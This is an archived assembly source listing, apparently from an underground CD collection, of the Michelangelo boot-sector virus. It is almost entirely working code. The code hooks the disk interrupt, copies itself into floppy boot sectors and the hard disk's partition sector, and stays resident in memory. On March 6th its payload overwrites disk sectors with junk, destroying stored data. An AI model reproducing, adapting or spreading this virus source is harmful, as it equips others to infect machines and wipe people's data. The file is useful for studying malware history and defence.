home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / s / stonedm.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  9.5 KB  |  244 lines
  1. michelangelo    segment byte public
  2.                 assume  cs:michelangelo, ds:michelangelo
  3.                 org     0
  4.  
  5.                 jmp     entervirus
  6. highmemjmp      db      0F5h, 00h, 80h, 9Fh
  7. maxhead         db      2                       ; used by damagestuff
  8. firstsector     dw      3
  9. oldint13h       dd      0C8000256h
  10.  
  11. int13h:
  12.                 push    ds
  13.                 push    ax
  14.                 or      dl, dl                  ; default drive?
  15.                 jnz     exitint13h              ; exit if not
  16.                 xor     ax, ax
  17.                 mov     ds, ax
  18.                 test    byte ptr ds:[43fh], 1   ; disk 0 on?
  19.                 jnz     exitint13h              ; if not spinning, exit
  20.                 pop     ax
  21.                 pop     ds
  22.                 pushf
  23.                 call    dword ptr cs:[oldint13h]; first call old int 13h
  24.                 pushf
  25.                 call    infectdisk              ; then infect
  26.                 popf
  27.                 retf    2
  28. exitint13h:     pop     ax
  29.                 pop     ds
  30.                 jmp     dword ptr cs:[oldint13h]
  31.  
  32. infectdisk:
  33.                 push    ax
  34.                 push    bx
  35.                 push    cx
  36.                 push    dx
  37.                 push    ds
  38.                 push    es
  39.                 push    si
  40.                 push    di
  41.                 push    cs
  42.                 pop     ds
  43.                 push    cs
  44.                 pop     es
  45.                 mov     si, 4
  46. readbootblock:
  47.                 mov     ax,201h                 ; Read boot block to
  48.                 mov     bx,200h                 ; after virus
  49.                 mov     cx,1
  50.                 xor     dx,dx
  51.                 pushf
  52.                 call    oldint13h
  53.                 jnc     checkinfect             ; continue if no error
  54.                 xor     ax,ax
  55.                 pushf
  56.                 call    oldint13h               ; Reset disk
  57.                 dec     si                      ; loop back
  58.                 jnz     readbootblock
  59.                 jmp     short quitinfect        ; exit if too many 
  60. failures
  61. checkinfect:
  62.                 xor     si,si
  63.                 cld
  64.                 lodsw
  65.                 cmp     ax,[bx]                 ; check if already 
  66. infected
  67.                 jne     infectitnow
  68.                 lodsw
  69.                 cmp     ax,[bx+2]               ; check again
  70.                 je      quitinfect
  71. infectitnow:
  72.                 mov     ax,301h                 ; Write old boot block
  73.                 mov     dh,1                    ; to head 1
  74.                 mov     cl,3                    ; sector 3
  75.                 cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
  76.                 je      is360Kdisk
  77.                 mov     cl,0Eh
  78. is360Kdisk:
  79.                 mov     firstsector,cx
  80.                 pushf
  81.                 call    oldint13h
  82.                 jc      quitinfect              ; exit on error
  83.                 mov     si,200h+offset partitioninfo
  84.                 mov     di,offset partitioninfo
  85.                 mov     cx,21h                  ; Copy partition table
  86.                 cld
  87.                 rep     movsw
  88.                 mov     ax,301h                 ; Write virus to sector 
  89. 1
  90.                 xor     bx,bx
  91.                 mov     cx,1
  92.                 xor     dx,dx
  93.                 pushf
  94.                 call    oldint13h
  95. quitinfect:
  96.                 pop     di
  97.                 pop     si
  98.                 pop     es
  99.                 pop     ds
  100.                 pop     dx
  101.                 pop     cx
  102.                 pop     bx
  103.                 pop     ax
  104.                 retn
  105. entervirus:
  106.                 xor     ax,ax
  107.                 mov     ds,ax
  108.                 cli
  109.                 mov     ss,ax
  110.                 mov     ax,7C00h                ; Set stack to just 
  111. below
  112.                 mov     sp,ax                   ; virus load point
  113.                 sti
  114.                 push    ds                      ; save 0:7C00h on stack 
  115. for
  116.                 push    ax                      ; later retf
  117.                 mov     ax,ds:[13h*4]
  118.                 mov     word ptr ds:[7C00h+offset oldint13h],ax
  119.                 mov     ax,ds:[13h*4+2]
  120.                 mov     word ptr ds:[7C00h+offset oldint13h+2],ax
  121.                 mov     ax,ds:[413h]            ; memory size in K
  122.                 dec     ax                      ; 1024 K
  123.                 dec     ax
  124.                 mov     ds:[413h],ax            ; move new value in
  125.                 mov     cl,6
  126.                 shl     ax,cl                   ; ax = paragraphs of 
  127. memory
  128.                 mov     es,ax                   ; next line sets seg of 
  129. jmp
  130.                 mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
  131.                 mov     ax,offset int13h
  132.                 mov     ds:[13h*4],ax
  133.                 mov     ds:[13h*4+2],es
  134.                 mov     cx,offset partitioninfo
  135.                 mov     si,7C00h
  136.                 xor     di,di
  137.                 cld
  138.                 rep     movsb                   ; copy to high memory
  139.                                                 ; and transfer control 
  140. there
  141.                 jmp     dword ptr cs:[7C00h+offset highmemjmp]
  142. ; destination of highmem jmp
  143.                 xor     ax,ax
  144.                 mov     es,ax
  145.                 int     13h                     ; reset disk
  146.                 push    cs
  147.                 pop     ds
  148.                 mov     ax,201h
  149.                 mov     bx,7C00h
  150.                 mov     cx,firstsector
  151.                 cmp     cx,7                    ; hard disk infection?
  152.                 jne     floppyboot              ; if not, do floppies
  153.                 mov     dx,80h                  ; Read old partition 
  154. table of
  155.                 int     13h                     ; first hard disk to 
  156. 0:7C00h
  157.                 jmp     short exitvirus
  158. floppyboot:
  159.                 mov     cx,firstsector          ; read old boot block
  160.                 mov     dx,100h                 ; to 0:7C00h
  161.                 int     13h
  162.                 jc      exitvirus
  163.                 push    cs
  164.                 pop     es
  165.                 mov     ax,201h                 ; read boot block
  166.                 mov     bx,200h                 ; of first hard disk
  167.                 mov     cx,1
  168.                 mov     dx,80h
  169.                 int     13h
  170.                 jc      exitvirus
  171.                 xor     si,si
  172.                 cld
  173.                 lodsw
  174.                 cmp     ax,[bx]                 ; is it infected?
  175.                 jne     infectharddisk          ; if not, infect HD
  176.                 lodsw                           ; check infection
  177.                 cmp     ax,[bx+2]
  178.                 jne     infectharddisk
  179. exitvirus:
  180.                 xor     cx,cx                   ; Real time clock get 
  181. date
  182.                 mov     ah,4                    ; dx = mon/day
  183.                 int     1Ah
  184.                 cmp     dx,306h                 ; March 6th
  185.                 je      damagestuff
  186.                 retf                            ; return control to 
  187. original
  188.                                                 ; boot block @ 0:7C00h
  189. damagestuff:
  190.                 xor     dx,dx
  191.                 mov     cx,1
  192. smashanothersector:
  193.                 mov     ax,309h
  194.                 mov     si,firstsector
  195.                 cmp     si,3
  196.                 je      smashit
  197.                 mov     al,0Eh
  198.                 cmp     si,0Eh
  199.                 je      smashit
  200.                 mov     dl,80h                  ; first hard disk
  201.                 mov     maxhead,4
  202.                 mov     al,11h
  203. smashit:
  204.                 mov     bx,5000h                ; random memory area
  205.                 mov     es,bx                   ; at 5000h:5000h
  206.                 int     13h                     ; Write al sectors to 
  207. drive dl
  208.                 jnc     skiponerror             ; skip on error
  209.                 xor     ah,ah                   ; Reset disk drive dl
  210.                 int     13h
  211. skiponerror:
  212.                 inc     dh                      ; next head
  213.                 cmp     dh,maxhead              ; 2 if floppy, 4 if HD
  214.                 jb      smashanothersector
  215.                 xor     dh,dh                   ; go to next 
  216. head/cylinder
  217.                 inc     ch
  218.                 jmp     short smashanothersector
  219. infectharddisk:
  220.                 mov     cx,7                    ; Write partition table 
  221. to
  222.                 mov     firstsector,cx          ; sector 7
  223.                 mov     ax,301h
  224.                 mov     dx,80h
  225.                 int     13h
  226.                 jc      exitvirus
  227.                 mov     si,200h+offset partitioninfo ; Copy partition
  228.                 mov     di,offset partitioninfo      ; table information
  229.                 mov     cx,21h
  230.                 rep     movsw
  231.                 mov     ax,301h                 ; Write to sector 8
  232.                 xor     bx,bx                   ; Copy virus to sector 1
  233.                 inc     cl
  234.                 int     13h
  235. ;*              jmp     short 01E0h
  236.                 db      0EBh, 32h               ; ?This should crash?
  237. ; The following bytes are meaningless.
  238. garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
  239. partitioninfo:  db      42h dup (0)
  240. michelangelo    ends
  241.                 end
  242.  
  243.  
  244.